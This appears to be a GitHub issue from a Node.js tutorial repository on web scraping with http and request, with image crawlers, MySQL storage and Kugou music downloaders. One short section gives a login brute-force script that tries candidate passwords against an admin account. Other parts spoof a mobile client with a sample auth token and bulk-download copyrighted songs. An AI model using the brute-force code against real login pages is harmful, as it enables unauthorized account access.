Wscats/node-tutorial

node原生模块爬虫和request爬虫方案

Wscats opened this issue · 5 comments

原生模块爬虫

// Built-in http module: used to request resources or to create a server
var http = require("http");
// Built-in fs module: used to read and write files
var fs = require("fs")
// cheerio module: jQuery-like API for working with the fetched markup
var cheerio = require("cheerio")
// Third-party mysql client module
var mysql = require("mysql")
// Describe the database connection (credentials are hard-coded for this demo)
var connection = mysql.createConnection({
	host: 'localhost', // database host
	user: 'test',
	password: '123456789',
	database: 'laoyao'
});

// Open the connection
connection.connect();
/**
 * Fetches the page at `url` over HTTP and passes its complete body to `callback`.
 *
 * The response stream decodes the bytes itself, so a multi-byte character
 * that happens to be split across two chunks is reassembled instead of being
 * turned into replacement characters.
 *
 * Request and response failures are logged; `callback` is not invoked for them.
 *
 * @param {string} url - Address of the page whose DOM will be crawled.
 * @param {function(string): void} callback - Receives the whole body once the response ends.
 */
function download(url, callback) {
	http.get(url, function(res) {
		var data = "";
		// Let the stream decode UTF-8 across chunk boundaries
		res.setEncoding('utf8');
		res.on('data', function(chunk) {
			data += chunk;
		});
		res.on('error', function(err) {
			console.error('problem with response: ' + err.message);
		});
		res.on('end', function() {
			callback(data);
		});
	}).on('error', function(err) {
		// Without this listener a DNS/connection failure would crash the process
		console.error('problem with request: ' + err.message);
	});
}

// Crawl the home page, store every image address in MySQL, then download the images.
download("http://www.mmjpg.com/", function(data) {
	// Hand the page to cheerio, which exposes a jQuery-like API over the markup
	var $ = cheerio.load(data);
	var imgArr = [];
	// Walk every <img>, persisting and collecting its address
	$('img').each(function(index, ele) {
		var src = $(ele).attr("src");
		// An <img> without a src attribute yields undefined: nothing to store or download
		if(!src) {
			return;
		}
		// src comes from a remote page, so it is bound through a placeholder
		// instead of being concatenated into the SQL text
		connection.query('INSERT INTO `meizi`(`src`) VALUES (?)', [src], function(error, results, fields) {
			if(error) throw error;
		});
		imgArr.push(src);
	})
	// Start downloading the collected images
	downloadImg(imgArr)
})
// Index of the image currently being downloaded; shared across downloadImg calls
var i = 0;
/**
 * Downloads the images in `imgArr` one at a time into img/<index>.jpg,
 * starting at the module-level index `i`.
 *
 * The next download only starts after the current file has been fully
 * written (or its request/write has failed), and nothing is requested once
 * `i` has reached the end of the array.
 *
 * @param {string[]} imgArr - Image URLs to download.
 */
function downloadImg(imgArr) {
	// Check the bound before touching imgArr[i] so no request/file is created past the end
	if(i >= imgArr.length) {
		return;
	}
	var writerStream = fs.createWriteStream('img/' + i + '.jpg');
	var advanced = false;
	// Moves on to the next image exactly once per download
	function next() {
		if(advanced) {
			return;
		}
		advanced = true;
		i++;
		downloadImg(imgArr);
	}
	// 'finish' fires once every byte has been flushed to the file
	writerStream.on('finish', next);
	writerStream.on('error', function(err) {
		console.error('problem writing image: ' + err.message);
		next();
	});
	http.get(imgArr[i], function(res) {
		res.pipe(writerStream);
	}).on('error', function(err) {
		console.error('problem with request: ' + err.message);
		// Closing the file triggers 'finish', which continues with the next image
		writerStream.end();
	});
}

注意要遍历生成多个写入流,不然有可能下载文件写入不成功

// Give every image its own write stream, named after its position in imgs
for(const idx of imgs.keys()) {
	const imgStream = fs.createWriteStream(`./img/vks${idx}.jpg`);
	download(imgs, idx, imgStream);
}

完整代码,记得创建img文件夹

var http = require("http");
var fs = require("fs");
//类似于 jQ
const cheerio = require("cheerio");
const queryStr = require("querystring");
// Form-encoded body sent with the POST request
var postData = queryStr.stringify({
	"msg": "Hello!"
})
// Send the HTTP request; the response page is scanned for <img> tags
var request = http.request({
	hostname: "www.ivsky.com",
	port: 80,
	method: "POST",
	headers: {
		'Content-Type': 'application/x-www-form-urlencoded',
		// Content-Length counts bytes, not string characters
		'Content-Length': Buffer.byteLength(postData)
	}
}, function(response) {
	var datas = "";
	var imgs = [];
	// Decode in the stream so a character split across chunks is not corrupted
	response.setEncoding('utf8');
	response.on("data", function(chunk) {
		datas += chunk;
	})
	response.on("end", function() {
		const $ = cheerio.load(datas);
		$("img").each(function(idx, dom) {
			imgs.push($(dom).attr("src"))
		})
		// Create one writable stream per image and start its download
		for(let i = 0; i < imgs.length; i++) {
			var imgStream = fs.createWriteStream(`./img/vks${i}.jpg`);
			download(imgs, i, imgStream)
		}
	})

})
request.on("error", function(err) {
	console.log('problem with request: ' + err.message)
})
request.write(postData)
// end() must always be called, even with an empty body: it marks the request as complete
request.end();

/**
 * Requests imgs[i] and pipes the response body into imgStream.
 *
 * A failed request is logged and imgStream is closed so the file handle it
 * holds is not left open.
 *
 * @param {string[]} imgs - Image URLs.
 * @param {number} i - Index of the URL to download.
 * @param {import('stream').Writable} imgStream - Destination for the image bytes.
 */
function download(imgs, i, imgStream) {
	http.get(imgs[i], function(res) {
		res.pipe(imgStream);
	}).on('error', function(err) {
		// Without this listener a connection failure would crash the process
		console.log('problem with request: ' + err.message);
		imgStream.end();
	});
}
//注意加end方法 结束请求
//req.end()必须被调用,即使没有在请求体内写入任何数据
//也必须调用。因为这表示已经完成HTTP请求

在pipe之前添加on('error',fn)可以监听错误,在后面添加on('close',fn)可以监听完成

// Destination file for the downloaded resource
var s = fs.createWriteStream(`./images/${f}/${i}`);
// Logs a failure of the request itself
const reportError = (err) => {
	console.log(err);
};
// Logs once the destination stream has closed
const reportDone = () => {
	console.log('成功!');
};
// 'error' is attached before pipe(), 'close' on the stream returned by pipe()
request(url)
	.on('error', reportError)
	.pipe(s)
	.on('close', reportDone);

参考文档

安装并引用request模块

官方详细文档

const request = require('request');

详细配置的写法

// Fully configured request: method, url, custom headers and form body.
// NOTE(review): the Authorization token and mid below are sample values —
// real credentials should not be committed to source.
request({
	method: 'GET',
	url: 'https://xxx/config/all',
	headers: {
		'Host': 'api.veilpark.com',
		'mid': '8678385b7d1eb259377973ee02cd9d52618fc0f7',
		'Accept': '*/*',
		'Authorization': 'token 40101431f0c64e83839a56c2069b1a63jcrk8on1',
		'Proxy-Connection': 'keep-alive',
		'Accept-Language': 'zh-Hans;q=1',
		'cversion': '4400',
		'Content-Type': 'application/json',
		'User-Agent': 'maskpark/4.4 (iPhone; iOS 9.3.1; Scale/2.00)',
		'Connection': 'keep-alive',
		'client': 'ios'
	},
	form: {}
}, (error, response, body) => {
	// Transport failure or non-200 answer: report and stop
	if(error || response.statusCode !== 200) {
		console.log("请求出错");
		return;
	}
	var info;
	try {
		info = JSON.parse(body);
	} catch(parseError) {
		// A 200 response is not guaranteed to carry valid JSON
		console.log("请求出错", parseError.message);
		return;
	}
	console.log(info);
})

网页暴力破解

const request = require('request');
const async = require('async');
// Passes every entry of the list to hack() and logs 'done' from the final callback.
// NOTE(review): only run this against systems you own or are explicitly authorized to test.
async.each(
	// Candidate password list
	['1', '2', '3'],
	(item, callback) => {
		// Signal completion of this item once hack() has called back
		hack(item, function() {
			callback(null)
		})
	},
	() => {
		console.log('done');
	}
);

/**
 * Posts one login form with the given password and logs the outcome.
 *
 * @param {string} password - Value sent in the 'PassWord' form field.
 * @param {function(): void} cb - Called with no arguments after the outcome is logged.
 */
function hack(password, cb) {
	request({
		method: 'POST',
		url: 'http://xxx/login',
		headers: {
			'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
		},
		form: {
			'AdminName': 'xxxx',
			'PassWord': password
		}
	}, (error, response, body) => {
		// A non-empty body is logged as a failed attempt, an empty one as a success
		if(body) {
			console.log("破解失败", "无可用密码");
		} else {
			console.log("破解成功", password);
		}
		cb()
	})
}

其他可以做的思路

酷狗批量下载音乐

参考1

var request = require('request');
var cheerio = require('cheerio');
var fs = require('fs');
// Crawl a singer page, resolve every song hash to its play URL and save the MP3.
request('http://www.kugou.com/yy/singer/home/3060.html', function(error, response, body) {
	if(error || !body) {
		console.log('problem with request: ' + (error ? error.message : 'empty response'));
		return;
	}
	var $ = cheerio.load(body);
	$('.song_hid').each(function(num, ele) {
		// Read the attribute once instead of re-querying it for every use
		var value = $(ele).attr("value");
		if(!value) {
			return;
		}
		console.log(value);
		// Length of the whole value
		var length = value.length;
		console.log(length);
		// Position of the first "|"
		var index = value.indexOf("|");
		console.log(index);
		// The hash sits between the first "|" and the last 7 characters
		var hash = value.substring(index + 1, length - 7);
		console.log(hash);
		request('http://www.kugou.com/yy/index.php?r=play/getdata&hash=' + hash, function(error, response, body) {
			var data;
			try {
				// Parse once; a failed request leaves body undefined, which also lands here
				data = JSON.parse(body).data;
			} catch(parseError) {
				console.log('invalid song data for ' + hash + ': ' + parseError.message);
				return;
			}
			if(!data || !data.play_url) {
				console.log('no play_url for ' + hash);
				return;
			}
			console.log(data.play_url);
			// audio_name comes from the remote API: strip characters that are
			// path separators or invalid in file names before using it on disk
			var fileName = String(data.audio_name).replace(/[\\\/:*?"<>|]/g, '_') + '.mp3';
			request(data.play_url).on('error', function(err) {
				console.log('problem downloading ' + fileName + ': ' + err.message);
			}).pipe(fs.createWriteStream(fileName));
		});
	});
})

参考2

// 1. Crawl the singer page
// 2. Parse the page and collect the id of every song by that singer
// 3. Build a URL from each id to obtain the song's download address
// 4. Perform the download
var request = require("request");
var cheerio = require("cheerio");
var fs = require("fs");
var mysql = require('mysql');
// Describe the database connection (credentials are hard-coded for this demo)
var connection = mysql.createConnection({
	host: 'localhost',
	user: 'wscats',
	password: '123456',
	database: 'kugou'
});
connection.connect(); // open the connection
// Crawl the singer page and store each song's name and play URL in the `song` table.
request("http://www.kugou.com/singer/3060.html", (err, res, body) => {
	if(err || !body) {
		console.log('problem with request: ' + (err ? err.message : 'empty response'));
		return;
	}
	var $ = cheerio.load(body);
	$(".song_hid").each(function(i, e) {
		var value = $(e).attr("value");
		if(!value) {
			return;
		}
		// value has the form "<name>|<hash>|..."; split it once
		var parts = value.split("|");
		var name = parts[0];
		var link = parts[1];
		console.log(link);
		request(`http://wwwapi.kugou.com/yy/index.php?r=play/getdata&hash=${link}`, function(err, res, body) {
			if(body) {
				var url;
				try {
					url = JSON.parse(body).data.play_url;
				} catch(parseError) {
					// Non-JSON body or a payload without `data`
					console.log('invalid song data for ' + name + ': ' + parseError.message);
					return;
				}
				console.log(url);
				// Values are bound through the placeholder, not concatenated into the SQL
				connection.query('INSERT INTO song SET ?', {
					name: name,
					url: url
				}, function(error, results, fields) {
					if(error) throw error;
					console.log(results);
				});
			}
		})
	})
})

原生http.request模拟客户端请求

const http = require('http');
const querystring = require('querystring');
// Form-encode the body first so its byte length is available for the header
const postData = querystring.stringify({ 'msg': 'helloworld' });

// Target of the request plus the headers describing the body
const options = {
    hostname: 'localhost',
    port: 8877,
    path: '/',
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Content-Length': Buffer.byteLength(postData)
    }
};

// Prints the status code and headers, then every body chunk as it arrives
function handleResponse(res) {
    console.log(`状态码: ${res.statusCode}`);
    console.log(`响应头: ${JSON.stringify(res.headers)}`);
    res.setEncoding('utf8');
    res.on('data', function(chunk) {
        console.log(`响应主体: ${chunk}`);
    });
    res.on('end', function() {
        console.log('响应中已无数据');
    });
}

// Reports a failure of the request itself
function handleRequestError(e) {
    console.error(`请求遇到问题: ${e.message}`);
}

const req = http.request(options, handleResponse);
req.on('error', handleRequestError);

// Write the data into the request body, then finish the request
req.write(postData);
req.end();

原生http.createServer创建服务器

const http = require('http');
const fs = require('fs');
// Sets permissive CORS headers and streams the request body back as the response
function echoWithCors(req, res) {
    res.setHeader('Access-Control-Allow-Origin', '*');
    res.setHeader('Access-Control-Allow-Headers', 'Origin, X-Requested-With, Content-Type, Accept');
    req.pipe(res);
}

// Serve on port 8877
http.createServer(echoWithCors).listen(8877);